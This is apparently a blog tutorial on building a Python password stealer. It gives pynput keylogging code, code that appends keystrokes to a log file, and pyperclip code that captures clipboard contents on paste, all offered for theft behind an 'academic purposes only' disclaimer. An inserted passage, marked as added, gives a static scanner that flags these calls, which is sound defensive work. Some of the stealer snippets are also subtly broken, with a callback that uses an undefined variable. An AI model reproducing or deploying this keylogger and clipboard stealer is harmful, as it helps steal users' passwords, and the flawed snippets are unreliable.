Coding a Simple Virus in Python
Published January 17, 2021
This is a guide to coding a simple virus in Python that steals users’ passwords. This is for academic purposes only.
I’ll keep it simple, but feel free to check out a link to the more detailed tutorial at the bottom of this article.
When it comes to coding a password stealer — where do you start? There are a number of ways to attain passwords on a user’s machine. One of the traditional and still most commonly used ways is to build what’s known as a keylogger.
A keylogger in the cyber world is a piece of software that runs on a user’s machine and stores every key they press.
However, it’s worth knowing that many web browsers and other software actively block events related to detecting key presses. This is the case with Google Chrome, where if you type into a password field, it will not trigger the key press events that you would usually expect.
More sophisticated keyloggers are written in low-level languages such as C/C++. This is because you have closer access to the hardware and are therefore less reliant on other software (web browsers) to tell you when keys are pressed.
Another technique you can use is to actively monitor the clipboard to detect what the user has copied. Let’s face it, many of us copy and paste passwords all the time. So this is a great way to grab a password. Funnily enough, rumour has it that TikTok actively stores what’s on your clipboard periodically.
pynput is a fantastic library for storing key presses in Python. Here’s a quick snippet for importing the library, monitoring the keyboard and printing key presses:
from pynput.keyboard import Listener
def log_key_press(self):
key = str(key).replace("'", "")
print(f"Key Press: {key}")
with Listener(on_press=log_key_press) as l:
l.join()
Now although this is good, it doesn’t store it to a file for review later. You can do that simply by opening a file handler in Python in append mode and then logging the key presses to that file:
KEYSTROKE_LOG_FILE = './logs/keystroke.log'
with open(KEYSTROKE_LOG_FILE, 'a') as f:
line_to_write = f"{now}: Key Press - {key}"
f.write(f"{line_to_write}\n")
The above will help you get something basic up and running. But, as we mentioned, typing into password fields on a browser will not render the key press events you need. In other words, the above won’t work.
One way around that is to keep an eye on the clipboard. With the premise that users copy and paste passwords, this will render great results! You can use the pyperclip library in Python to do this.
Typically when a user pastes something, they do so with a key combination. Now on a Mac, this is Cmd + V. So, one easy way is to detect if a user has pressed Cmd and then just check the clipboard contents and store it in a file:
import pyperclip
if key == 'Key.cmd_r':
contents = pyperclip.paste()
print(contents)
Now this code is simple and will result in duplicates. Though, you can easily make changes to avoid this.
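Seen from the defender's side, both techniques above leave recognizable calls in source: a pynput Listener registered with a key-press callback, pyperclip.paste(), and a file opened in append mode. The following is an added example, not code from the original article: a static triage check over Python source, where the function names, the verdict labels and the fixture are assumptions made for illustration.

```python
import ast

def _mode(call):
    """Literal mode of an open() call, or '' when absent or not a string literal."""
    arg = call.args[1] if len(call.args) > 1 else next(
        (k.value for k in call.keywords if k.arg == "mode"), None)
    return arg.value if isinstance(arg, ast.Constant) and isinstance(arg.value, str) else ""

def scan_source(source):
    """Map each indicator to the source lines where it occurs."""
    nodes = list(ast.walk(ast.parse(source)))
    mods = set()  # top-level names of every imported module
    for n in nodes:
        if isinstance(n, ast.Import):
            mods |= {a.name.split(".")[0] for a in n.names}
        elif isinstance(n, ast.ImportFrom) and n.module:
            mods.add(n.module.split(".")[0])
    hits = {"key_hook": [], "clipboard_read": [], "append_write": []}
    for n in nodes:
        if not isinstance(n, ast.Call):
            continue
        leaf = ast.unparse(n.func).split(".")[-1]  # "pyperclip.paste" -> "paste"
        kwargs = {k.arg for k in n.keywords}
        if "pynput" in mods and leaf == "Listener" and kwargs & {"on_press", "on_release"}:
            hits["key_hook"].append(n.lineno)
        elif "pyperclip" in mods and leaf == "paste":
            hits["clipboard_read"].append(n.lineno)
        elif leaf == "open" and _mode(n).startswith("a"):
            hits["append_write"].append(n.lineno)
    return {k: sorted(v) for k, v in hits.items()}

def verdict(hits):
    """Hook plus a capture sink matches the article's pattern; a hook alone needs review."""
    if hits["key_hook"] and (hits["clipboard_read"] or hits["append_write"]):
        return "suspicious"
    return "review" if hits["key_hook"] else "clean"

# Constructed fixture: only the indicator calls, with a stub callback.
SAMPLE = (
    "from pynput.keyboard import Listener\n"
    "import pyperclip\n"
    "def cb(key): pass\n"
    "Listener(on_press=cb)\n"
    "pyperclip.paste()\n"
    "open('keystroke.log', 'a')\n"
)

if __name__ == "__main__":
    found = scan_source(SAMPLE)
    print(found, verdict(found))
```

A literal-only static check misses dynamic imports and obfuscated code, so treat it as triage alongside endpoint telemetry rather than as a verdict on its own.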
This was a very simple example of writing a password stealer in Python. Now you have a better understanding of the basics involved in building your own keylogger and pitfalls and things that you should be aware of going forward.
Feel free to check out the more detailed version of the tutorial here with the full code.